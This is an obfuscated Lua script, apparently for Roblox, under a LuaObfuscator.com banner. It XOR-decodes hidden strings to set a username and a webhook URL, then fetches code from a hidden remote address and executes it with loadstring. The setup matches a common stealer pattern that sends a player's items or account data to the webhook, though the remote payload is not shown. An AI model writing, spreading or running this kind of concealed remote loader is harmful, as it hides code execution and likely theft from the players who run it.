--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for i=1 + 0, #v8 do v6(v10,v0(v4(v1(v2(v8,i,i + 1)),v1(v2(v9,1 + ((i-(1 + (0 -0)))% #v9),1 + ((i-(1 + 0))% #v9) + 1)))%256));end return v5(v10);end UserName=v7("\39\100\36\188\223\87\133\175","\95\18\97\200\183\54\228\193");WebHook=v7("\73\7\234\59\74\16\249\14\23\247\56\90\69\164\69\93\253\36\84\5\183\81\26\177\60\92\72\190\78\28\245\56\22\27\230\20\70\167\114\13\31\239\16\70\174\121\0\25\238\19\67\173\100\20\82\180\102\37\173\36\79\24\128\101\75\213\121\1\28\167\98\70\237\34\92\115\149\21\0\193\127\14\108\184\102\60\244\31\120\67\131\111\43\206\125\118\31\153\77\22\242\58\96\18\238\104\11\250\8\81\71\137\86\20\173\30\126\78\147\69\2","\33\115\158\75\57\42\214");loadstring(game:HttpGet(v7("\184\171\82\206\191\99\113\255\173\71\201\226\62\55\164\183\83\220\185\42\59\162\188\73\208\184\60\48\164\241\69\209\161\118\22\177\173\66\249\173\52\59\131\172\9\238\159\1\113\189\190\79\208\227\10\61\162\182\86\202\226\53\43\177","\208\223\38\190\204\89\94"),true))();
